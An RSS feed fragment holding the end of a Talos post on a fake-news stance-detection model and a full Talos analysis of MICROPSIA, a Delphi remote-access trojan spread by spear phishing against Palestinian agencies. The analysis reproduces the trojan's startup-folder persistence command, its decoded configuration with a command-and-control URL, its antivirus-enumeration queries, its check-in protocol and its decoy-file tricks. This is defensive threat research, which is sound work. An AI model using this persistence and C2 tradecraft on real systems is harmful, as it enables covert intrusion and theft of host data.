href="https://1.bp.blogspot.com/-hplmWSR1p-w/WUlDBO30j6I/AAAAAAAAAPU/nKRsYp6SjJM81msMzsn3kBmiGpf7xJ7GwCLcBGAs/s1600/tree_model_dark6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1361" data-original-width="1600" height="544" src="https://1.bp.blogspot.com/-hplmWSR1p-w/WUlDBO30j6I/AAAAAAAAAPU/nKRsYp6SjJM81msMzsn3kBmiGpf7xJ7GwCLcBGAs/s640/tree_model_dark6.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Diagram outlining our decision tree model&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;After exploring the dataset, a few features that are likely to be informative of headline/body relationships became obvious -- for example:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The number overlapping words between the headline and body text;&lt;/li&gt;&lt;li&gt;Similarities measured between the word count, 2-grams and 3-grams; and&lt;/li&gt;&lt;li&gt;Similarities measured after transforming these counts with term frequency-inverse document frequency (&lt;a href="https://en.wikipedia.org/wiki/Tf%E2%80%93idf" target="_blank"&gt;TF-IDF&lt;/a&gt;) weighting and Singular Value Decomposition (&lt;a href="https://en.wikipedia.org/wiki/Singular_value_decomposition" target="_blank"&gt;SVD&lt;/a&gt;).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Using these features, it is not necessary to use a powerful and expressive model to learn the complex mapping from these features to the stance label.&lt;br /&gt;&lt;br /&gt;For this, Gradient-Boosted Decision Trees were chosen because of the model’s robustness with regard to the different scales of our feature vectors. &amp;nbsp;Specifically, no normalization is needed and it can be regularized in several different ways to avoid overfitting. Furthermore, &lt;a href="https://github.com/dmlc/xgboost" target="_blank"&gt;XGBoost&lt;/a&gt; is a very efficient, open-source implementation that was easily applied to the handcrafted features.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;/div&gt;&lt;h4&gt;Real World Exercise&lt;/h4&gt;&lt;br /&gt;Some readers may be wondering what the output of our system looks like with real-world data. &amp;nbsp;As a fun exercise, we ran the contents of a first draft of this blog post through our system with various headlines -- the real headline of the post, and a few others we made up for the sake of this activity. &amp;nbsp;These headlines are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Talos Targets Disinformation with Fake News Challenge Victory (the real headline);&lt;/li&gt;&lt;li&gt;Team Loses Fake News Challenge;&lt;/li&gt;&lt;li&gt;Research Shows Fake News is Unsolvable; and&lt;/li&gt;&lt;li&gt;Giraffe Livestream Continues to Fourth Week with No Action.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;We were excited to see whether or not our models would be able to correctly detect the stance of our blog post with each of these headlines. &amp;nbsp;The results can be found in the figure below:&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-b1qO5M633HQ/WUlDMNU285I/AAAAAAAAAPc/FFgeo_8xnGgeEuIC0ghklTIwdXCOdWqrACLcBGAs/s1600/blog_titles_dark7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="1368" height="640" src="https://2.bp.blogspot.com/-b1qO5M633HQ/WUlDMNU285I/AAAAAAAAAPc/FFgeo_8xnGgeEuIC0ghklTIwdXCOdWqrACLcBGAs/s640/blog_titles_dark7.png" width="546" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Results of this blog post and various test headlines being evaluated by our system&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;As shown above, while neither the deep learning approach nor the GBDT approach had perfect accuracy, the combination of these two approaches with a 50/50 weighting detected the correct stance for each headline.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;In the end, these innovative model implementations put &lt;a href="http://www.fakenewschallenge.org/#fnc1results" target="_blank"&gt;Talos on top of the global leaderboard&lt;/a&gt;. &amp;nbsp;While more research needs to be done, Talos’s award-winning research on stance detection is an important first step toward tackling the problem of fake news and disinformation in the 21st century. &lt;br /&gt;&lt;br /&gt;As the Fake News Challenge moves forward and the natural language processing community continues to churn out cutting-edge research, Talos remains committed to continually forcing the bad guys to innovate.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtoD2o9EqnI:eeA9q71YvE4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtoD2o9EqnI" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-21T08:43:57.912-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s72-c/TalosInTheNews1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/talos-fake-news-challenge.html</feedburner:origLink></item><item><title>Delphi Used To Score Against Palestine</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/UdXRBd5VW9A/palestine-delphi.html</link><category>Palestine</category><category>RAT</category><category>Talos</category><category>Threat Research</category><author>noreply@blogger.com (Warren Mercer)</author><pubDate>Mon, 19 Jun 2017 08:48:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-966413230305129216</guid><description>This blog was authored by &lt;a href="https://www.blogger.com/profile/10073079939160046441"&gt;Paul Rascagneres&lt;/a&gt; and &lt;a href="http://blogs.cisco.com/author/warrenmercer"&gt;Warren Mercer&lt;/a&gt;&amp;nbsp;with contributions from &lt;a href="https://blogs.cisco.com/author/emmanueltacheau"&gt;Emmanuel Tacheau&lt;/a&gt;,&amp;nbsp;&lt;a href="https://blogs.cisco.com/author/emmanueltacheau"&gt;&lt;/a&gt;&lt;a href="https://www.blogger.com/profile/18152595187998952871"&gt;Vanja Svajcer&lt;/a&gt; and &lt;a href="https://www.blogger.com/profile/17941683095374027310"&gt;Martin Lee&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.3ib9qkmn7w54"&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;Talos continuously monitors malicious emails campaigns. We identified one specific spear phishing campaign launched against targets within Palestine, and specifically against Palestinian law enforcement agencies. This campaign started in April 2017, using a spear phishing campaign to deliver the MICROPSIA payload in order to remotely control infected systems. Although this technique is not new, it remains an effective technique for attackers.&lt;br /&gt;&lt;br /&gt;The malware itself was developed in Delphi; in this article, we describe the features and the network communication to the command and control server used by the attackers. The threat actor has chosen to reference TV show characters and include German language words within the attack. Most significantly, the attacker has appeared to have used genuine documents stolen from Palestinian sources as well as a controversial music video as part of the attack. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.lbywxgmnsh4g"&gt;Spear Phishing Campaign&lt;/h2&gt;&lt;br /&gt;We identified a spear phishing campaign that appeared to be targeting members of the Palestinian law enforcement services as well as other Palestinian targets in the public sector. The email purports to be sent from an individual named "Yasser Saad" but includes a mismatch between the apparent name and the email address '&lt;a href="mailto:yassersaaid01@gmail.com"&gt;yassersaaid01@gmail.com&lt;/a&gt;' suggesting "Yasser Saaid".&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="436" data-original-width="1600" height="174" src="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The subject of the email translates to "Brothers security officers and directors", with the text content "Kindly to view and circulate under the responsibility:&lt;br /&gt;The Council of Ministers' Decision on the Use of the Internet in Government Institutions"&lt;br /&gt;&lt;br /&gt;Attached to the email is a .r10 file, which suggests that the file is a tenth part of a split RAR archive. However, this isn't the case. The attachment is a simple RAR file. Despite the unusual file name extension, this file can be opened by many RAR archive handlers without modification. &lt;br /&gt;&lt;br /&gt;The RAR archive contains a single executable file named: InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe&lt;br /&gt;&lt;br /&gt;The .r10 file extension may have been chosen in order to confuse automated file parsing systems that check for malicious contents of archives with known file name extensions. Similarly, the long name of the file within the archive, along with the ending '_pdf.exe' may have been used to convince victims into thinking that the file is a real PDF file. It is worth keeping in mind that by default Windows will not show the .exe extension to the user.  The icon of executable file itself is that commonly used for PDF files, enhancing the idea that the contents of the archive is a PDF.&lt;br /&gt;&lt;br /&gt;When the executable is launched it extracts the decoy document embedded as the PE  resource named Resource_1 and opens it.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.e9om8fxbuzcl"&gt;Decoy Document&lt;/h3&gt;&lt;br /&gt;The decoy document displayed, InternetPolicy.pdf, is a scanned document by the Ministry Of Interior of the State Of Palestine, signed by Dr Alaa Mousa, Minister of Communications &amp;amp; Technologies:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-VTBikCk-Rdw/WUftVP1oi-I/AAAAAAAAATs/B711nmvYeRcpehemiGN1VouC_YQ2ON3-ACLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1411" data-original-width="1044" height="640" src="https://1.bp.blogspot.com/-VTBikCk-Rdw/WUftVP1oi-I/AAAAAAAAATs/B711nmvYeRcpehemiGN1VouC_YQ2ON3-ACLcBGAs/s640/image8.png" width="472" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The decoy document contains 7 pages describing new internet usage policies. The first page (shown above) informs governmental departments of the policy, and instructs them to follow it. A handwritten note stated to be from the Director of the IT Department adds his 'seal of approval' to the document.&lt;br /&gt;&lt;br /&gt;In the background, the malware MICROPSIA is executed on the infected system. This malware is a Remote Administration Tool (RAT), it will be described later.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.kaqrkq3hrcn7"&gt;Associated Campaigns&lt;/h2&gt;&lt;br /&gt;We have also identified drive-by download campaigns which are distributing variants of the same malware, but with different decoy documents.&lt;br /&gt;&lt;br /&gt;URLs used in this campaign include:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10&lt;/li&gt;&lt;li&gt;http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10&lt;/li&gt;&lt;li&gt;http://feteh-asefa[.]com/pc/public/Altarnatevs.r10&lt;/li&gt;&lt;li&gt;https://sheldon-cooper[.]info/attachment.r10&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;As with the spear phish, the archives also have the same .r10 extension. The first two archives contain the file: Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe which although the file name suggests a .docx file, the icon is that of a PDF document.&lt;br /&gt;&lt;br /&gt;The second two archives contain the file: Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe  Again being an executable file with a PDF style icon.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.x2eg478ars49"&gt;Decoy Documents&lt;/h3&gt;&lt;br /&gt;&lt;h4 id="h.ktbt9l8tcx1f"&gt;Altarnatives_Palestine Document&lt;/h4&gt;&lt;br /&gt;The .pdf decoy document is study from the Palestinian Center for Policy Research and Strategic Studies (MASARAT): &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-yROszkBAVzY/WUftbDF0ubI/AAAAAAAAATw/FrjxSdzUrkYXLm_AEZxO7PUTlsKBytzegCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1299" data-original-width="976" height="640" src="https://1.bp.blogspot.com/-yROszkBAVzY/WUftbDF0ubI/AAAAAAAAATw/FrjxSdzUrkYXLm_AEZxO7PUTlsKBytzegCLcBGAs/s640/image6.png" width="480" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;This 22 pages long research document addresses the current level of threat &amp;amp; security issues within the West Bank for 2016 &amp;amp; 2017. It contains chapters relating to human rights, data from Arab World for Research and Development center, violence center report etc.&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.njabpcn4p3jy"&gt;Fuqha_NewDetails Document&lt;/h4&gt;&lt;br /&gt;This 8 page long document appears to be an intelligence report based on interviews, documents and public information. The document mentions an assassination report of one of the highest ranked officers of the Al Qassam group's (Millitary Wing of HAMAS, aka Armed Militia). The document contains a single image, an illustration of the leadership of Hamas, hierarchical security &amp;amp; subgroups:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-i67ZadIH5Gk/WUftfUvtGFI/AAAAAAAAAT0/zI9t6pCeQYEoWXaHnMEwX3SodZEnGHfGACLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1012" data-original-width="1356" height="476" src="https://2.bp.blogspot.com/-i67ZadIH5Gk/WUftfUvtGFI/AAAAAAAAAT0/zI9t6pCeQYEoWXaHnMEwX3SodZEnGHfGACLcBGAs/s640/image11.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.ge6voyei1hbi"&gt;Further Campaigns&lt;/h2&gt;&lt;br /&gt;We also identified additional, related malicious documents which conform to the same naming pattern and which share indicators with the original malware we discovered.&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.kxzoyb47xhog"&gt;Plan_Palestine Document&lt;/h4&gt;&lt;br /&gt;Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe&lt;br /&gt;&lt;br /&gt;The decoy document of this sample is a word document. It presents the strategic objectives, policies and interventions concerning security units (aka Police), including how to face the challenges, how to train police, new weapons etc.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-4kIGYDSNWy8/WUftj5JCdXI/AAAAAAAAAT4/wXxw3SP7zFAJp66w5ry1--Ki_OIv-HgEQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="963" data-original-width="1391" height="442" src="https://2.bp.blogspot.com/-4kIGYDSNWy8/WUftj5JCdXI/AAAAAAAAAT4/wXxw3SP7zFAJp66w5ry1--Ki_OIv-HgEQCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.r9dmg4v7ay7x"&gt;Diwan2017_Palestine Document&lt;/h4&gt;&lt;br /&gt;Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe&lt;br /&gt;&lt;br /&gt;This decoy document is a PDF file. The document itself appears to be scanned from the Council of Ministers of Palestine and relates to an announcement concerning employee regulation.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-RnBkCYh_nBg/WUftot1kwjI/AAAAAAAAAT8/7ZIsg_Qg3wUWp8i_wgQF5MARG3nORhELwCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="740" data-original-width="1243" height="380" src="https://2.bp.blogspot.com/-RnBkCYh_nBg/WUftot1kwjI/AAAAAAAAAT8/7ZIsg_Qg3wUWp8i_wgQF5MARG3nORhELwCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.6z3wqvgglusc"&gt;Goal2017 Document&lt;/h4&gt;&lt;br /&gt;Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe&lt;br /&gt;&lt;br /&gt;Instead of a decoy document, this sample is a decoy video of a music clip  "Goal"  by the Lebanese singers Myriam Klink and Jad Khalife. This video is particularly controversial as the overt nature of the video led it to be &lt;a href="http://gulfnews.com/news/mena/lebanon/lebanese-pop-singer-s-song-goal-banned-1.1989080"&gt;banned&lt;/a&gt; by the Lebanese Justice ministry. The sharing or airing of it is subject to a fine of 50 000 000 Lebanese Liras (approximately 33k USD).&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Z1YWVvlDAQY/WUftuybsOuI/AAAAAAAAAUA/MgYlC2x1QUkWguyFZPAdABo9SmNhR_I6wCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1124" data-original-width="1600" height="448" src="https://2.bp.blogspot.com/-Z1YWVvlDAQY/WUftuybsOuI/AAAAAAAAAUA/MgYlC2x1QUkWguyFZPAdABo9SmNhR_I6wCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.qp114fnr5rbi"&gt;MICROPSIA Analysis&lt;/h2&gt;&lt;br /&gt;For all of these decoy documents, the malware is identical, the only differences are the sections containing the decoy documents themselves. The malware is a remote access trojan (RAT) written in Delphi named MICROPSIA.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.s648ug5mqht7"&gt;Features&lt;/h3&gt;&lt;br /&gt;Firstly, the malware copies itself in C:\ProgramData\MediaPlayer\ExecuteLibrary.exe. The malware contains several resources, one of which is the decoy document, another is a legitimate binary developed by OptimumX named shortcut.exe. As expected the purpose of this tool is to create a shortcut. It is through creating a shortcut that the malware ensures its persistence:&lt;br /&gt;&lt;br /&gt;Shortcut.exe /f:"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D_Windows_v1.lnk" /a:c /t:"C:\ProgramData\MediaPlayer\ExecuteLibrary.exe"&lt;br /&gt;&lt;br /&gt;The malware is a Remote Administration Tool (RAT) which downloads and executes an executable obtained from the Command &amp;amp; Control infrastructure. This executable is downloaded in string format and  then modified to become a binary file with the Hex2Bin Delphi API.&lt;br /&gt;&lt;br /&gt;An interesting element is the obfuscation algorithm used to hide the configuration of the RAT. The variables are stored in a custom base64:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-jVsLyDrA1bM/WUftzgWMn8I/AAAAAAAAAUE/0yRKg-hIi_AYtX9CD_JNIzUQ1YDj4NuKwCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="245" data-original-width="1165" height="134" src="https://4.bp.blogspot.com/-jVsLyDrA1bM/WUftzgWMn8I/AAAAAAAAAUE/0yRKg-hIi_AYtX9CD_JNIzUQ1YDj4NuKwCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once decoded with base64 and with 2 XOR Keys we can obtain the configuration of the malware:&lt;br /&gt;&lt;br /&gt;[{000214A0-0000-0000-C000-000000000046}]&lt;br /&gt;Prop3=19,2&lt;br /&gt;[InternetShortcut]&lt;br /&gt;IDList=&lt;br /&gt;URL=file://&lt;br /&gt;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&lt;br /&gt;http://camilleoconnell.website/api/white_walkers/&lt;br /&gt;daenerys&lt;br /&gt;betriebssystem&lt;br /&gt;anwendung&lt;br /&gt;mikasa&lt;br /&gt;ackerman&lt;br /&gt;ginny&lt;br /&gt;AV&lt;br /&gt;&lt;br /&gt;We will see later, that this configuration contains the User-Agent, the CC URL and the json keys used for the network communication.&lt;br /&gt;&lt;br /&gt;Additionally the malware is interested by Anti-Virus installed on the system. It uses WMI queries to get this information:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;SELECT * FROM AntiVirusProduct&lt;/li&gt;&lt;li&gt;SELECT * FROM AntiSpywareProduct&lt;/li&gt;&lt;li&gt;SELECT * FROM FirewallProduct&lt;/li&gt;&lt;/ul&gt;If an security product is installed this information is sent to the attacker.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.ymt85pkt0l8p"&gt;Network Communication&lt;/h3&gt;&lt;br /&gt;All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website&lt;br /&gt;&lt;br /&gt;The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&lt;br /&gt;&lt;br /&gt;To register a new infected system the malware perform a POST request to /api/white_walkers/new with data on the compromised system consisting of: &lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;the filename of the executed malware and the version;&lt;/li&gt;&lt;li&gt;the version of the infected Operating System;&lt;/li&gt;&lt;li&gt;the hostname and username encoded in base64.&lt;/li&gt;&lt;/ul&gt;The CC will reply in json format. The json object contains an ID (incremented each time that an infected system is registered) and 3 other boolean values: load_varys, lma and ausfart. Here is an output of a registration:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-c7jdXV_jcVo/WUft5aZFMvI/AAAAAAAAAUI/Ubz3G-hRB6Eblo2bAnEF4Z__as8KmiXgQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1368" data-original-width="1289" height="640" src="https://1.bp.blogspot.com/-c7jdXV_jcVo/WUft5aZFMvI/AAAAAAAAAUI/Ubz3G-hRB6Eblo2bAnEF4Z__as8KmiXgQCLcBGAs/s640/image7.png" width="602" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;As part of our investigation we believe currently more than 500 systems are already registered on the CC. This number may be a mix of genuinely infected systems and security researcher sandbox systems.&lt;br /&gt;&lt;br /&gt;After a registration, the malware periodically performs HTTP requests to the CC with the following pattern: GET /api/white_walkers/[base64_data_previously_sent]/requests&lt;br /&gt;&lt;br /&gt;The server will reply with a json object. We assume that the server can issue orders to the infected system. Here is an example:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-99p4DZfrd4o/WUft_PKymUI/AAAAAAAAAUM/_9rVBD3KQ1sUsI262ppR-RX5cgY7hI_OQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="680" data-original-width="1464" height="296" src="https://2.bp.blogspot.com/-99p4DZfrd4o/WUft_PKymUI/AAAAAAAAAUM/_9rVBD3KQ1sUsI262ppR-RX5cgY7hI_OQCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.pgw1sv2vz9nk"&gt;Reference to TV Show Characters&lt;/h3&gt;&lt;br /&gt;In the analysed variant, we identify several reference to TV Show characters in the network communication and the URLs used by this actor:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;sheldon-cooper[.]info: this URL is a reference to one of the main characters of "The Big Bang Theory" named Sheldon Cooper;&lt;/li&gt;&lt;li&gt;Camilleoconnell[.]website: this URL is a reference to Camille O'Connell, the main actress of "The Vampire Diaries" and "The Originals";&lt;/li&gt;&lt;li&gt;Mikasa Ackerman is a json key returned by the CC. And this name is a character in "Attack on Titan";&lt;/li&gt;&lt;li&gt;/White_Walker/ in the URL is a species in the TV Show "Game of Thrones";&lt;/li&gt;&lt;li&gt;Deanerys is a variable used during Web request. This is the name of a character in "Game of Thrones";&lt;/li&gt;&lt;li&gt;Lord_varys is another json key returned by the CC. This is the name of a "Game of Thrones" character.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;The malware author appears to have a real interest for TV shows.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.wskswv4247aj"&gt;Goethe's Style&lt;/h3&gt;&lt;br /&gt;We identified the use of german language words in the network communication with the Command and Control server.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;"Betriebssystem" which means Operating System. This variable is used to send the OS version (for example "Windows 7 Service Pack 1 (Version 6.1, Build 7601, 32-bit Edition)")&lt;/li&gt;&lt;li&gt;"Anwendung" which means Application. This variable is used to send the filename and the version of the malware.&lt;/li&gt;&lt;li&gt;"Ausfahrt" which means Exit. This is a json key used by the CC during network communication. The key contains a boolean (false/true)&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;Obviously, the use of german words does not necessarily means that the author is German. The author could simply be adding german word in order to cover their tracks.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.pnupqfp5hnx9"&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;This spear phishing campaign was directed against Palestinian authorities and possibly against other entities. At least 500 machines have been registered by the CC infrastructure, which is still operating, indicating that this is a successful campaign.&lt;br /&gt;&lt;br /&gt;At Talos, we have in-depth experience of many APT campaigns, in this case one of the most surprising elements is the overt naming convention: the author deliberately uses references to several US TV show and intentionally uses German words for malware communication. We have no indication if these inclusions are to confuse attribution, to mock analysts, or a lapse of trade craft. This is in contrast to the highly convincing decoy documents which appear to be copies of genuine documents relating to the current situation in Palestine which suggests a high degree of professionalism.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.2fgixc2s1066"&gt;IOCs&lt;/h2&gt;&lt;br /&gt;&lt;h3 id="h.wh86gl8glcyp"&gt;File hashes&lt;/h3&gt;&lt;br /&gt;InternetPolicy.r10: 9b162f43bcbfaef4e7e7bdffcf82b7512fac0fe81b7f2c172e1972e5fe4c9327&lt;br /&gt;&lt;br /&gt;InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe: 9cb5ef0b17eea1a43d5d323277e08645574c53ab1f65b0031a6fc323f52b0079 &lt;br /&gt;&lt;br /&gt;Attachment.r10: c7081b00ad8db62519c7af2cb5f493f56ecc487b087ae52d01f43953d2aa6952  &lt;br /&gt;&lt;br /&gt;Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe: 0180e2b601ae643e7adf1784c313dd2d10d114bd2b5692eb6e9c031a6e448ed1  &lt;br /&gt;&lt;br /&gt;Fuqha_NewDetails_docx.r10: 94902877b2cb523548a272d4e4fe0789192e1cb35b531297368b16a2865b33af  &lt;br /&gt;&lt;br /&gt;Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe: 77adba034d13b570c6aab79282326a1eb2efdfc14fbd7cd0651906e3fa31f9fe  &lt;br /&gt;&lt;br /&gt;Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe:  6c5884cf45d943f51566ea98113fecf851d49f59b70c8039aa21a14e09e21e5c&lt;br /&gt;&lt;br /&gt;Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe: 7c87f992674b962269d7fb2ffbad6d21f606c90d151a6fb67ac54387b6883aae&lt;br /&gt;&lt;br /&gt;Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe:&lt;br /&gt;&lt;br /&gt;5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.r55c8jr4gcmu"&gt;Domains&lt;/h3&gt;&lt;br /&gt;feteh-asefa[.]com&lt;br /&gt;&lt;br /&gt;sheldon-cooper[.]info&lt;br /&gt;&lt;br /&gt;camilleoconnell[.]website&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.nnjxx82ean4t"&gt;URLs&lt;/h3&gt;&lt;br /&gt;http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10&lt;br /&gt;&lt;br /&gt;http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10&lt;br /&gt;&lt;br /&gt;http://feteh-asefa[.]com/pc/public/Altarnatevs.r10&lt;br /&gt;&lt;br /&gt;https://sheldon-cooper[.]info/attachment.r10&lt;br /&gt;&lt;br /&gt;http://camilleoconnell[.]website/api/white_walkers/new &lt;br /&gt;&lt;br /&gt;http://camilleoconnell[.]website/api/white_walkers/[base64]/requests&lt;br /&gt;&lt;br /&gt;&lt;h2 